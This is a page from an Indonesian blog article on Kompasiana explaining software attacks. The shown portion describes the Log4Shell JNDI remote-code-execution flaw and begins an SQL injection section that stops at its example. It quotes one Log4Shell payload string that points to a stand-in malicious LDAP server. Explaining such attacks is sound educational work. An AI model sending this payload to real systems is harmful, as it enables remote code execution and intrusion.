Mohon tunggu...
Sausan ShalihahAlfirdausi
Sausan ShalihahAlfirdausi Mohon Tunggu... UIN Maulana Malik Ibrahim Malang

exito

Selanjutnya

Tutup

Ilmu Alam & Tekno

Serangan Heartbleed, Log4Shell, dan SQL Injection: Ancaman Nyata dalam Keamanan Perangkat Lunak

14 Mei 2025   00:01 Diperbarui: 14 Mei 2025   00:01 42
+
Laporkan Konten
Laporkan Akun
Kompasiana adalah platform blog. Konten ini menjadi tanggung jawab bloger dan tidak mewakili pandangan redaksi Kompas.
Lihat foto
Bagikan ide kreativitasmu dalam bentuk konten di Kompasiana | Sumber gambar: Freepik

Kerentanannya terletak pada kemampuannya memproses input yang dapat memicu eksekusi kode jarak jauh (Remote Code Execution/RCE) melalui JNDI (Java Naming and Directory Interface). Penyerang cukup mengirimkan string khusus seperti:

${jndi:ldap://malicious-server.com/a}

Jika log tersebut direkam tanpa validasi, maka Log4j akan melakukan lookup ke server jahat dan mengeksekusi kode berbahaya.

Keunikan dan bahayanya adalah:

  • Bisa dieksploitasi hanya dengan mengirimkan nama pengguna atau User-Agent tertentu.

  • Banyak digunakan di aplikasi besar seperti Minecraft, Apache, dan aplikasi enterprise.

  • Mudah dieksploitasi dengan dampak yang besar.

Log4Shell dianggap sebagai salah satu kerentanan paling serius dalam dekade terakhir karena kombinasi dari popularitas pustaka, kemudahan eksploitasi, dan dampak luas.

3. Serangan SQL Injection

Berbeda dengan dua serangan sebelumnya yang tergolong baru, SQL Injection (SQLi) merupakan teknik serangan yang sudah lama dikenal, tetapi masih sangat relevan. SQL Injection terjadi ketika input dari pengguna dimasukkan langsung ke dalam perintah SQL tanpa validasi atau sanitasi yang benar.

Contohnya:

HALAMAN :
  1. 1
  2. 2
  3. 3
  4. 4
Mohon tunggu...

Lihat Konten Ilmu Alam & Tekno Selengkapnya
Lihat Ilmu Alam & Tekno Selengkapnya
Beri Komentar
Berkomentarlah secara bijaksana dan bertanggung jawab. Komentar sepenuhnya menjadi tanggung jawab komentator seperti diatur dalam UU ITE

Belum ada komentar. Jadilah yang pertama untuk memberikan komentar!
LAPORKAN KONTEN
Alasan
Laporkan Konten
Laporkan Akun